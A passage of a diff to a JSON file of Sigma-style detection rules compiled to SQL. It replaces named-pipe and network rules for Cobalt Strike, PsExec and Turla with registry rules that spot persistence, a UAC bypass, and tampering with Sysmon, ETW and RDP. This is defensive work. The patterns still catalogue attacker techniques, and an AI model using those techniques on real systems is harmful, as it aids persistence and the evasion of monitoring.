'\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", - "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.005", + "attack.t1059.007" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_mal_adwind.yml" + }, + { + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "author": "frack113", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "status": "test", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218.003" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "status": "test", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + ], + "filename": "registry_set_comhijack_sdclt.yml" + }, + { + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.execution", - 